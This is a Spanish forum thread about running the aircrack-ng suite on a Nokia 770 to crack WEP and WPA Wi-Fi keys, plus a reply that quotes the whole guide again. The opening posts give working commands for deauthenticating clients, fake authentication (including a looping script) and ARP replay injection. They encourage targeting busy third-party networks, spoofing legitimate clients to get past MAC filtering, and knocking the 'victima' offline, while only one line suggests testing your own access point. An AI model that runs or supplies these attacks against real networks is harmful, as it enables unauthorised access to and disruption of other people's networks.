Registrado: Aug 01, 2006 Mensajes: 284 0.22 mensajes por día
ID Tracking: 362890
Publicado: Mie 27 Dic 2006 1:57Asunto: Suite aircrack-ng en Nokia 770 comandos y configuración
-Post en Construcción-
Aircrack-ng
Mister X escribió:
Aircrack-ng 0.5 es un paquete de herramientas destinadas al monitoreo y análisis de redes inhalámbricas con el que podremos poner a prueba la seguridad del cifrado de conexiones WEP (Wired Equivalent Privacy) y WPA (Wi-Fi Protected Access).
Una vez ejecutemos el programa, podremos capturar paquetes de información de una red concreta (o de las que sea capaz de detectar nuestra tarjeta) con una de las herramientas incluidas en Aircrack-ng 0.5: Airodump, un sniffer que se encargará de capturar los paquetes necesarios para llevar a cabo la operación con éxito.
Cuando los paquetes capturados sean suficientes, sólo tendremos que cargarlos con Aircrack para que éste descifre la clave y podamos acceder a la red a la que pertenezcan.
Aireplay-ng 0.5 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
attack modes:
--deauth count : deauthenticate all stations
--fakeauth delay : fake authentication with AP
--interactive : interactive frame selection
--arpreplay : standard ARP-request replay
--chopchop : decrypt/chopchop WEP packet
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write : Dump file prefix (mandatory)
-w : same as --write
By default, airodump-ng hop on 2.4Ghz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channel> : Capture on a specific channel
-c : Same as --channel
-a : Will hop on 5Ghz channels
--abg : Will hop on 2.4Ghz channels
1. Con Kismet o con airodump-ng seleccionar el AP (punto de acceso) "objetivo", desde Kismet, clasificar los AP's usando "S" seguido de "C". Seleccionar tu AP "Enter" para coger la información (MAC Address, WEP, Channel etc.) Presiona "q" para dejar la pantalla, y con mi AP selecciona tecleando "L"
2. Abrir consola de comandos, AiroDump para "sniffar" los paquetes
Cmd=
Código:
airodump-ng -w capture -c 0 wlan0
OK, "airodump-ng" es el programa de la suite de aircrack
"-w capture" Captura -write- los packetes sniffados con extensión "capture.cap".
"-c 0" Selecciona el nº de canal "0", del ejemplo "sniffara" de todos los canales, seleccionado un número del 1 al 11, del objetivo elegido solamente.
"wlan0" El nombre de mi dispositivo wireless dado por el tipo de chipset "Prism2"
Desde airodump-ng, seleccionamos la MAC address del objetivo AP y los packets/data capturados los Data IV's)
3. Abrir otra consola, con AirePlay realizamos un ataque para "deautenticacar a la maquina seleccionada "el objetivo" conectado al AP para desconectar la maquina seleccionada y forzar la reconexión con el AP, en este proceso el AP enviara paquetes que incluiran la WEP key.
Cmd =
Código:
aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 wlan0
"aireplay-ng" incluido en la suite aircrack-ng
"-e DLINK" nombre del SSID del objetivo del AP.
"-a 00:11:22:33:44:55" MAC address del objetivo AP.
"-c 66:77:88:99:00:AA" es la MAC address de la maquina seleccionada conectada al AP (debes poder encontrar cualquier máquina conectada con el AP, observando la Info de AiroDump).
"--deauth 10" el tipo de ataque realizado, al este caso, el ataque de DEAUTH repetido 10 veces.
"wlan0" el nombre de mi AP.
Preparamos este comando pero no lo enviamos todavia (recomendado el copy-paste al carecer de teclado fisico)
4. Abrir otra pantalla en consola, volver a AIREPLAY, capturar los paquetes que pudieran contener cualquier dato, bombear al AP “fingiendo” ser la máquina receptora que el otro caso de Aireplay realizó el ataque de DEAUTH
"aireplay-ng" otro programa de la suite aircrack-ng
"--arpreplay" es la funcion de aireplay planificada, en este caso repite una peticion ARP, que contendra paquetes IV´s
"-b 00:11:22:33:44:55" MAC del objetivo AP.
"-h 66:77:88:99:00:AA" MAC de la maquina seleccionada conectada al AP. STATION
"wlan0" ...
Lanzado el comando, deberia de buscar los paquetes.
El commando anterior inicia la deautenticación, cambiar a aireplay (lo teniamos preparado) en la otra pantalla. Deberias de detectar deauth/discon de la maquina, que captura paquetes, y comenzar a bombardear al nuevo AP by simulando ser la maquina receptora.
Clickar sobre la ventana de airodump y esperar a conseguir paquetes y IV resultante de la inyección.
Puedes cerrar la ventada de deautenticacion de aireplay "una vez asociados los puntos AP de atacante y Objetivo" y dejar la otra ventana, llamando "petición de ARP" -replaying- hasta conseguir los paquetes necesarios para crackear la llave WEP.
5. Abrir la pantalla FINAL de la consola, AirCrack explorara los paquetes capturados de AiroDump.
"aircrack-ng" Nombre del programa de la misma suite.
"-f 4" corre el Fudgefactor 4 veces
"-m 00:11:22:33:44:55" MAC address del objetivo AP.
"-n 64" los pedacitos de bits que componen la key, puede ser de 64-bit, de 128-bit... etc.
"capture.cap" Nombre del "file" capturado por AiroDump "puedes poner el que te plazca.
Encender y apagar, depende de la velocidad de tu PC, pocos IV's pueden contener tu key si es debil (yo con 80.000 una vez me hice con una) lo normal suelen ser 250.000 paquetes, algunas veces la cosa se desmadra hasta el Millón (si) 1.000.000 de paquetes... y BINGO! encontraras la key.
Testarlo sobre tú propio AP para comprobar la seguridad de vuestra key, podeis usar vuestro N770.
Problemas que plantea "aircrack-ng" en nuestro gachet Nokia 770
* La captura de paqutes "IV´s, CAP´s, se realiza en "root/directorio" de flash memory (64 Mb) lo que conlleva un pequeño inconevniente de reduccion de rendimiento según aumentan los paquetes y se achica nuestra flash
- el comando rm, elimina los paquetes de "cd root" tras un ls, "rm paquete.iv"
Registrado: Aug 01, 2006 Mensajes: 284 0.22 mensajes por día
ID Tracking: 372393
Publicado: Dom 28 Ene 2007 15:13Asunto:
PRIMEROS PASOS ;
* Modo Monitor y los Bug conocidos de "aircrack-ng" en N770
Airmon-ng; es un script que lanza nuestro chip Conexant CX3110x en Modo Monitor (en escucha para poder captar los paquetes que transmiten otras redes wireless sin estar asociados a ellas) antes de empezar a capturar tráfico debemos poner nuestra tarjeta en modo monitor usando este script
El airmon-ng por defecto NO se instala bien en Maemo N770 adelanto que no funciona, por lo que hay que realizar un Nuevo Script a mano:
Algo así como
Código:
ifconfig wlan0 down
iwconfig wlan0 mode Monitor
iwconfig channel x
iwpriv wlan0 monitor_type 1 &>/dev/null
ifconfig wlan0 up
Código:
• wlan0 = como llama N770 a el chip Conexant CX3110x
Que viene a ser como el “cmd” de la suite que no funciona:
Código:
airmon-ng <start/stop> <wlan0> [canal]
* star para arrancar wlan0, stop para detener el modo monitor
Se puede buscar y editar dentro ofuera de nuestra N770
Nota; diferenciar entre Modo monitor o RFMON y Modo promiscuo en donde un PC conectado en red compartida, captura todos los paquetes de todas las computadoras de dicha RED para inspeccionar la RED. Muchos chip normales permiten este modo.
Un Manual General y Completo de la Auditoria con Arcrack-ng, aquí por thefkboss
Un Manual Completo del Kismet para Nokia 770, AQUÍ
Aquí comienza el;
Manual especifico de aircrcak-ng 05 para Maemo Nokia 770
Anatomía de una Auditoria Wireless;
Tres en uno; Sniffer, ataque y romper clave
1º Los “sniffer” para detectar redes al alcance, para seleccionar el “objetivo” para centrar la “escucha” de los paquetes “*ivs ó *cap” dependiendo del tipo de encriptación
- Airodump : captura los paquetes de una red inalambrica en un archivo, este archivo es compatible con el formato pcap de tcpdump, ethereal, etc;
- Kismet; Nos permite obtener información necesaria como el canal en el que esta configurado el acess point, el essid, la mac address del access point
2º Los ataques, el encargado por antonomasia es;Aireplay: toma el tráfico ARP y lo reenvía al access point, haciendo APR spoofing del cliente asociado al access point, realiza 5 tipos de ataques:
Código:
Ataque 0: Desautenticacion
Ataque 1: Autenticacion falsa
Ataque 2: Seleccion intereactiva del paquete a enviar
Ataque 3: Reinyección de petición ARP
Ataque 4: El "chopchop" de KoreK (predicción de CRC)
Aireplay-ng es imprescindible para poder capturar el número necesario de paquetes para “romper” una clave WEP o para dé-autenticar un cliente y forzar un HandSahke ó “Apretón de manos” entre BBSID y una STATION
3º Romper la clave encriptada, mediante; Aircrack: analiza los archivos capturados por airodump y extraerá la clave WEP.
Sniffando paquetes
Airodump-ng sirve para capturar datos (*.ivs - vectores iniciales-> para WEP, ó *.cap para WPA) sniffados a través del protocolo 802.11 (a/b/g) para terminar el destape de clave con aircrack-ng.
Con un receptor GPS BlueTooth conectado al N770 airodump-ng nos muestra las condenadas del AP, para rizar el rizo desde la pagina de GoogleMaps podemos determinar la posición exacta en el mapa del punto “sniffado”
¿a que suena bien?
# airodump-ng; podemos arrancarlo tras el script airmon-ng, o iniciar directamente
• Nota; NO ejecutes Kismet y airodump al tiempo, hacen lo mismo y confundirás al chip wifi.
Código:
airodump-ng [opción(es)] wlan0
OPCIONES:
Código:
--ivs: Captura solo ivs
--gpsd: Para usar un dispositivo Gps
--write <nombre del archivo a guardar> :crea un archivo del nombre que le hallamos puestos y con las extensión(.cap ó .ivs)y empieza a capturar.
-w: es lo mismo que poner write
--beacons: Guarda los beacons, por defecto no los guarda.
Por defecto airodump captura todos los canales que se encuentren dentro de la frecuencia 2,4 Ghz.
Código:
--channel :Captura el canal especificado
--c: Lo mismo que escribir channel
-a: Captura en la frecuencia de 5Ghz especifica del canal a
--abg: Captura tanto en frecuencias de 2,4Ghz como en 5 Ghz
EJEMPLO; disposición y sintaxis de los comandos
# abres una ventana de xTerm, con permisos de súperusuario “root” (sudo gainroot ó sudo su -)
Código:
airodump-ng --ivs -w nokia -c 0 -abg wlan0
Con esto conseguimos un archivo nokia.ivs y escucha de todos los canales (“0”) en los protocolos a/b/g de la RED wireless 802.11
Código:
airodump-ng -w nokia -c 0 -abg wlan0
Con este otro crea un archivo *cap (al no indicar extensión) llamado nokia en todos los canales por colocar “0” si queremos de uno en concreto, especificamos su numero en Redes 802.11 a/b/g
Recomiendo las abreviaturas en las órdenes:
-c en lugar de --channel -w en lugar de – write
* nuestro pequeño teclado "manda"
Estrategia de una auditoria; * NOTA; presta atención a los acrónimos, que es como te moverás desde la línea de cmd.
Una vez lanzado airodump-ng nos fijaremos en 2 parámetros:
1º Los puntos de acceso (AP) al alcance, bajo el epígrafe BSSID 2º La lista de clientes conectados o estaciones ("stations").
Registrado: Aug 01, 2006 Mensajes: 284 0.22 mensajes por día
ID Tracking: 372455
Publicado: Dom 28 Ene 2007 17:58Asunto:
Ataques, inyectando tráfico
Hay que tener claros unos conceptos, en cuanto a ataques:
• Para claves WEP, la clave del éxito es la “cantidad” de *IV´s” capturados
• Para claves WPA, la clave del éxito es la “calidad” de señal par capturar el “saludo” el Handshake entre BSSID y STATION
- Ya lo iremos viendo sobre la marcha…
ROMPIENDO WEP; Capturando Paquetes *Iv´s
Una recomendación inicial es la de elegir una RED con mucho tráfico
Primero; generara paquetes IVs necesarios para poder crackear la contraseña WEP.
# Una RED con muy buena señal pero sin gente conectada, costara más tiempo, y no debemos de olvidar que nos movemos con pila. No obstante se puede atacar sin problemas una RED sin clientes y con un poco más de paciencia
La clave del éxito del ATAQUE a WEP es el tráfico;
• el tráfico genera paquetes nosotros capturamos el trafico y en estos paquetes esta troceada la preciada clave de acceso WEP.
• si no hay tráfico tendremos que generarlo nosotros.
Aireplay-ng , son 5 tipos de ataques:
Ni que decir que Airodump-ng esta previamente capturando los resultados que obtengamos con Aireplay-ng
Ataque 0: Desautenticacion Ataque 1: Autenticacion falsa
Ataque 2: Seleccion intereactiva del paquete a enviar
Ataque 3: Reinyección de petición ARP
Ataque 4: El "chopchop" de KoreK (predicción de CRC)
Usaremos solo los Ataques “0/1/3”
Ataque 0 – Deautenticación; genera tráfico ARP al desconectar al cliente seleccionado tendra que volver a autenticar generando tráfico. Este tipo de ataque es necesario cuando su ESSID no se muestra pero vemos su BSSID y para poder inyectar con éxito ARP (mediante envenenamiento) al cliente
Código:
# aireplay-ng -0 5 -a BSSID -c STATION wlan0
El valor 5 indica que ejecutará -5 veces- el ataque, se puede personalizar a 10, 15…
De poner 0 conseguirás tirar a bajo la conexión del cliente (no es lo que buscamos, ¿no?)
- Una vez veamos el BSSID de RED es decir la “Mac Adress” del “AP” dispositivo, cesaremos este ataque (he hay la explicación de la frecuencia del “5”)
-Con la opción -a apunta al BSSID de red del objetivo y con -c señalamos la STATION (Mac) del cliente conectado.
Esta opción servirá de inicio al siguiente tipo de ataque, el ataque 1
Notas:
• Este ataque es muy útil para averiguar el ESSID de una red con el ESSID oculto.
• Este ataque no sirve de nada si no hay clientes conectados.
Ataque 1 - Falsa autenticación; la base de este asunto es capturar tráfico. Con un cliente conectado “BSSID + STATION” mejor, sin cliente conectado lo tendremos que generar.
En ambos casos generaremos tráfico para acelerar la captura de paquetes, inyectaremos tráfico al objetivo y veremos si todo va bien como suben los “*IV´s” a velocidad de vertigo
# creamos un falso cliente con una Mac falsa “00:11:22:33:44:55” que se va a registrar en la red.
El valor “0” indica que se ejecutará el ataque 1 sola vez.
Otro valor “30” , ejecutara la autenticación cada 30 segundos es necesario dependiendo del tipo de Router que estemos abordando
La opción -e indica el ESSID, (=el nombre de la red)
La -a indica el BSSID, AP del objetivo
La -h indica la STATION Mac con que asociarnos, una falsa Mac 00:11:22:33:44:55
Si todo ha ido bien aparecerá una línea como esta: Association successful y lo sabras por que inyección se ira acelerando gradualmente.
Si no se lleva a cabo la asociación puede ser por varios motivos:
La distancia y ó la calidad de la señal con que nuestro N770 escuche, la lejanía de la red con lo que le cuesta asociarse.
Solución; intentar bajar la velocidad de la tarjeta con
xTerm, con la opción CtrlUP repetirá el cmd entero sin necesidad de teclear nada
Si el fallo persiste (suele pasar) nos quedamos sin reinyección, otra forma de solucionar esto sera crear un simple script que ejecutara el ataque continuamente;
Script
Código:
j=0
while [ $j -ge 0 ]; do
aireplay-ng -1 0 -e ESSID -a AA:BB:CC:DD:EE -h 00:11:22:33:44:55 waln0
j=$[$j+1]
done
Cita:
La última carga contra una RED difícil;
Si el objetivo tiene habilitado un filtrado Mac, será más difícil abrir la red. Con clientes conectados, tendríamos que fijarnos en esas direcciones STATION y desde Kismet con la opción c sobre cualquier red echarlos de la red con el Ataque 0 – Deautenticación, y asociarnos con esa STATION con el Ataque 1 - Falsa autenticación.
Si en el modo monitor somos total y absolutamente invisibles a ojos del objetivo con este último método dejamos sin red a nuestra victima por lo que sería bueno sopesar que el cliente no este en casa para que no reinicie su conexión.
Ataque 3 - Reinyección de paquetes ARP; desde Airodump-ng que vemos [columna data = paquetes IV´s] paquetes capturados a un ritmo moderado.
Sin cliente conectado a la red o por la de-autenticación generada por nosotros con el Ataque 0, nos moriríamos esperando.
El Ataque 3: captura paquetes válidos (ARP), paquetes capturados, multiplicándolos y reinyectándolos sobre la RED, el Ataque 3 siempre precedido de Ataque 0 y Ataque 1
El valor -b indica el BSSID de red.
El valor -h la STATION, puede ser STATION Mac de un cliente asociado o una STATION Mac falsa (Ataque 1) asociada por nosotros
* la -x indica el número de paquetes por segundo. (600 al ejemplo)
Precedido del Ataque 1 empezara a reinyectar paquetes. Nos debemos de fijar en la cifra entre paréntesis para estar seguro de que estamos reinyectando, y observar como la columna data va aumentando su número de manera veloz.
¿Cuántos paquetes IV´s son necesarios para Romper una clave WEP?
WEP de 64 bits de 300.000 - 400.000 paquetes IV´s
WEP de 128 bits de 1.000.000 -1.500.000 de paquetes (en realidad son de 108 bit)
Cita:
Estas cifras no son nunca exactas. Unas veces con menos (yo la que menos con 40.000 y la que más con 500.000 para una WEP de 64 Bit)
Ultima edición por caraconejo el Dom 28 Ene 2007 18:07, editado 1 vez
bryaneduardo Registrado: Jul 24, 2008 Mensajes: 2 0.00 mensajes por día
ID Tracking: 536674
Publicado: Jue 24 Jul 2008 6:57Asunto: Re: Suite aircrack-ng en Nokia 770 comandos y configuración
Hola amigo, te pido el favor que me ayudes, yo tengo una Nokia 770 OS2006 y el unico aircrack que he podido instalar es el 0.9 pero no trae aireplay-ng asi que no puedo inyectar, por favor, si tienes aircrack-ng 0.5 Muchas gracias
Ultima edición por bryaneduardo el Dom 23 Nov 2008 6:53, editado 1 vez
Registrado: Jul 17, 2008 Mensajes: 8 0.01 mensajes por día
ID Tracking: 536684
Publicado: Jue 24 Jul 2008 9:44Asunto:
Buenas:
Interesante programa.
Antes de liarme con él:
¿Ha cambiado el método desde la versión que aquí tenemos (V0.5) y la actual (V1.0rc1)?
¿Existe algún fronted para este programa para evitar el engorroso uso de los comando para aquellos como yo que los desconocemos?
¿Alternativas?
urko Registrado: Jun 17, 2008 Mensajes: 55 0.09 mensajes por día
ID Tracking: 536688
Publicado: Jue 24 Jul 2008 10:10Asunto: Re: Suite aircrack-ng en Nokia 770 comandos y configuración
bryaneduardo escribió:
caraconejo escribió:
-Post en Construcción-
Aircrack-ng
Mister X escribió:
Aircrack-ng 0.5 es un paquete de herramientas destinadas al monitoreo y análisis de redes inhalámbricas con el que podremos poner a prueba la seguridad del cifrado de conexiones WEP (Wired Equivalent Privacy) y WPA (Wi-Fi Protected Access).
Una vez ejecutemos el programa, podremos capturar paquetes de información de una red concreta (o de las que sea capaz de detectar nuestra tarjeta) con una de las herramientas incluidas en Aircrack-ng 0.5: Airodump, un sniffer que se encargará de capturar los paquetes necesarios para llevar a cabo la operación con éxito.
Cuando los paquetes capturados sean suficientes, sólo tendremos que cargarlos con Aircrack para que éste descifre la clave y podamos acceder a la red a la que pertenezcan.
Aireplay-ng 0.5 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : fakeauth attack : set target AP SSID
-j : arpreplay attack : inject FromDS pkts
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
attack modes:
--deauth count : deauthenticate all stations
--fakeauth delay : fake authentication with AP
--interactive : interactive frame selection
--arpreplay : standard ARP-request replay
--chopchop : decrypt/chopchop WEP packet
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write : Dump file prefix (mandatory)
-w : same as --write
By default, airodump-ng hop on 2.4Ghz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channel> : Capture on a specific channel
-c : Same as --channel
-a : Will hop on 5Ghz channels
--abg : Will hop on 2.4Ghz channels
1. Con Kismet o con airodump-ng seleccionar el AP (punto de acceso) "objetivo", desde Kismet, clasificar los AP's usando "S" seguido de "C". Seleccionar tu AP "Enter" para coger la información (MAC Address, WEP, Channel etc.) Presiona "q" para dejar la pantalla, y con mi AP selecciona tecleando "L"
2. Abrir consola de comandos, AiroDump para "sniffar" los paquetes
Cmd=
Código:
airodump-ng -w capture -c 0 wlan0
OK, "airodump-ng" es el programa de la suite de aircrack
"-w capture" Captura -write- los packetes sniffados con extensión "capture.cap".
"-c 0" Selecciona el nº de canal "0", del ejemplo "sniffara" de todos los canales, seleccionado un número del 1 al 11, del objetivo elegido solamente.
"wlan0" El nombre de mi dispositivo wireless dado por el tipo de chipset "Prism2"
Desde airodump-ng, seleccionamos la MAC address del objetivo AP y los packets/data capturados los Data IV's)
3. Abrir otra consola, con AirePlay realizamos un ataque para "deautenticacar a la maquina seleccionada "el objetivo" conectado al AP para desconectar la maquina seleccionada y forzar la reconexión con el AP, en este proceso el AP enviara paquetes que incluiran la WEP key.
Cmd =
Código:
aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 wlan0
"aireplay-ng" incluido en la suite aircrack-ng
"-e DLINK" nombre del SSID del objetivo del AP.
"-a 00:11:22:33:44:55" MAC address del objetivo AP.
"-c 66:77:88:99:00:AA" es la MAC address de la maquina seleccionada conectada al AP (debes poder encontrar cualquier máquina conectada con el AP, observando la Info de AiroDump).
"--deauth 10" el tipo de ataque realizado, al este caso, el ataque de DEAUTH repetido 10 veces.
"wlan0" el nombre de mi AP.
Preparamos este comando pero no lo enviamos todavia (recomendado el copy-paste al carecer de teclado fisico)
4. Abrir otra pantalla en consola, volver a AIREPLAY, capturar los paquetes que pudieran contener cualquier dato, bombear al AP “fingiendo” ser la máquina receptora que el otro caso de Aireplay realizó el ataque de DEAUTH
"aireplay-ng" otro programa de la suite aircrack-ng
"--arpreplay" es la funcion de aireplay planificada, en este caso repite una peticion ARP, que contendra paquetes IV´s
"-b 00:11:22:33:44:55" MAC del objetivo AP.
"-h 66:77:88:99:00:AA" MAC de la maquina seleccionada conectada al AP. STATION
"wlan0" ...
Lanzado el comando, deberia de buscar los paquetes.
El commando anterior inicia la deautenticación, cambiar a aireplay (lo teniamos preparado) en la otra pantalla. Deberias de detectar deauth/discon de la maquina, que captura paquetes, y comenzar a bombardear al nuevo AP by simulando ser la maquina receptora.
Clickar sobre la ventana de airodump y esperar a conseguir paquetes y IV resultante de la inyección.
Puedes cerrar la ventada de deautenticacion de aireplay "una vez asociados los puntos AP de atacante y Objetivo" y dejar la otra ventana, llamando "petición de ARP" -replaying- hasta conseguir los paquetes necesarios para crackear la llave WEP.
5. Abrir la pantalla FINAL de la consola, AirCrack explorara los paquetes capturados de AiroDump.
"aircrack-ng" Nombre del programa de la misma suite.
"-f 4" corre el Fudgefactor 4 veces
"-m 00:11:22:33:44:55" MAC address del objetivo AP.
"-n 64" los pedacitos de bits que componen la key, puede ser de 64-bit, de 128-bit... etc.
"capture.cap" Nombre del "file" capturado por AiroDump "puedes poner el que te plazca.
Encender y apagar, depende de la velocidad de tu PC, pocos IV's pueden contener tu key si es debil (yo con 80.000 una vez me hice con una) lo normal suelen ser 250.000 paquetes, algunas veces la cosa se desmadra hasta el Millón (si) 1.000.000 de paquetes... y BINGO! encontraras la key.
Testarlo sobre tú propio AP para comprobar la seguridad de vuestra key, podeis usar vuestro N770.
Problemas que plantea "aircrack-ng" en nuestro gachet Nokia 770
* La captura de paqutes "IV´s, CAP´s, se realiza en "root/directorio" de flash memory (64 Mb) lo que conlleva un pequeño inconevniente de reduccion de rendimiento según aumentan los paquetes y se achica nuestra flash
- el comando rm, elimina los paquetes de "cd root" tras un ls, "rm paquete.iv"
Hola amigo, te pido el favor que me ayudes, yo tengo una Nokia 770 OS2006 y el unico aircrack que he podido instalar es el 0.9 pero no trae aireplay-ng asi que no puedo inyectar, por favor, si tienes aircrack-ng 0.5 o cualquier otro que me sirve para esta version del sistema operativo no dudes en enviarmela al correo bryaneduardo@msn.com espero que me ayudes y muchisimas gracias por tu tiempo
Indice del Foro
-> Maemo -> Suite aircrack-ng en Nokia 770 comandos y configuración
Todas las horas son GMT + 1 Hora Página 1 de 1
Puede publicar nuevos temas en este foro No puede responder a temas en este foro No puede editar sus mensajes en este foro No puede borrar sus mensajes en este foro No puede votar en encuestas en este foro No puede adjuntar archivos en este foro Puede descargar archivos de este foro
Nokia 6110 Navigator/ SonyEricsson K750i 
Windows XP SP3/Ubuntu Studio 
Wireless 
Olympus E-300 
si
